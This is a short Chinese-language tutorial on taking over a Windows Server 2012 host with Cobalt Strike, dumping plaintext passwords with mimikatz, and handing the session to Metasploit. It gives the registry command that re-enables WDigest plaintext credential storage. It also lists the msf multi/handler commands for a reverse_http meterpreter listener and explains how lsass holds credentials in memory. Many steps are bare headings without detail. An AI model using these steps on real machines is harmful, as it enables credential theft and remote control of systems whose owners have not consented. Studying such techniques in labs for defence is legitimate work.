mimikatz抓取win2012明文密码
一、启动cs服务端
二、启动cs客户端
三、创建监听器
四、生成脚本文件
五、选择存放路径
六、开启服务,让win2012能够通过网站下载
七、获得win2012控制权
八、抓取明文密码
mimikatz是可以抓明文的,mimikatz抓明文原理:
windows输入密码的进程是winlogon.exe,然后输入密码后给到lsass.exe这个进程,这个进程会存储一份明文再内存中,ntlmv2加密后发一份给sma文件,mimikatz就抓内存中的明文。
由于微软将windows补丁之后,就导致windows将不会再把明文存储在内存中,这就代表使用mimikatz将无法再抓取到明文密码
要想抓取到明文密码我可以通过修改注册表中的数据:
shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f
再将windows2012重启一下或者睡眠一下,让管理员重新进行密码登录,这里可以使用上传脚本给win2012运行来达到目的,我这里就手动重新输入一次密码登录。
cs与msf进行权限传递
一、启动msf,开启msf监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_http(注:这里是http,与cs上线的监听器一致)
set lhost 本机ip
set lport 自己的端口号
run
二、在cs中创建msf监听器
三、在上线的主机中右键点击spwan,选择msf监听器
四、msf上线成功
)
